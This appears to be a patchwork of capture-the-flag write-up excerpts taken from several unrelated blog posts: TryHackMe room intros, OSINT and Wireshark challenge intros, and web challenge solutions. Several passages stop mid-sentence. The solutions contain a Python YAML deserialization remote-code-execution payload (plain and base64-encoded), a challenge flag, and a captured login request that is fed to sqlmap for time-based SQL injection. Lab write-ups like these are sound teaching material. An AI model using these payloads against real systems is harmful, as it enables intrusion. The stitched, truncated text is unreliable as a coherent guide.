Hey folks welcome to my blog. In this blog, I’ll be presenting the write-up for a TryHackMe room called Internal. This room is rated as hard in terms of difficulty and serves as a penetration testing box.
Reconnaissance Scanning First things first, let’s begin by running an Nmap scan on the provided IP address.
Nmap nmap -A -p- 10.10.123.64 -oN nmap/aggresive-scan-all-ports -T4 # Nmap 7.80 scan initiated Tue Apr 2 23:25:47 2024 as: nmap -A -p- -oN nmap/aggresive-scan-all-ports -T4 10.
Hello, everyone! In this article, I’ll walk you through a TryHackMe room called Startup. This room is designed for beginners, testing your skills in web exploitation, FTP access, remote code execution, and, ultimately, gaining root access through a basic cronjob privilege escalation. Get ready to tackle this beginner-friendly challenge and learn as you progress. Let’s dive in!
Reconnaissance Scanning Nmap scan Let’s start with an aggressive -A Nmap scan on all ports -p-.
Hey amigos, I participated in WinjaCTF Nullcon Goa 2023 online and solved some OSINT and web challenges. However, I could only solve two challenges in the OSINT category. In this article, I’m going to demonstrate how I solved these OSINT challenges.
Memento Pts: 100
Challenge Description Megan, who tends to be forgetful, embarked on a journey to an unfamiliar destination. While capturing memories through photographs, she encountered an unfortunate incident where one of her pictures became distorted.
Hey there, in this write-up I’ll be sharing solutions for challenges in the networking category of BDSec CTF 2023. If you’re interested in learning the fundamentals of Wireshark and network traffic analysis, you’re in the right place. If you are new to Wireshark and network traffic analysis, please check out my previous article 👇.
Continue reading to explore the challenge solutions and enhance your Wireshark skills.
To follow along, you can download the challenge file attached below 👇 Download: challenge.
Hijack It shows a serialized config.
www.base64decode.org It is using Python as its backend, and some kind of serialization.
By Google search I found this blog.
!!python/object/apply:os.system ["cat flag.txt"] Encode this RCE payload in base64.
ISFweXRob24vb2JqZWN0L2FwcGx5Om9zLnN5c3RlbSBbImNhdCBmbGFnLnR4dCJdCg== Flag: HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}
Restricted From the Dockerfile I found that the flag is being renamed with a random string with a flag_ prefix in the root directory.
So our flag will look like flag_t04P0.
There are restricted commands, so to list the available commands use compgen -ac.
Orbital Visit the IP address and we see a login panel.
login panel Manual SQLi didn’t work, so I saved the POST request into a file.
request.txt:
POST http://64.227.41.83:30772/api/login HTTP/1.1
Host: 64.227.41.83:30772
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://64.227.41.83:30772/
Content-Type: application/json
Origin: http://64.227.41.83:30772
Content-Length: 37
Connection: close

{"username":"admin","password":"admin"}
And using sqlmap, I found a time-based SQLi in the username parameter.
Command:
ryuk@kali:~# sqlmap -r request.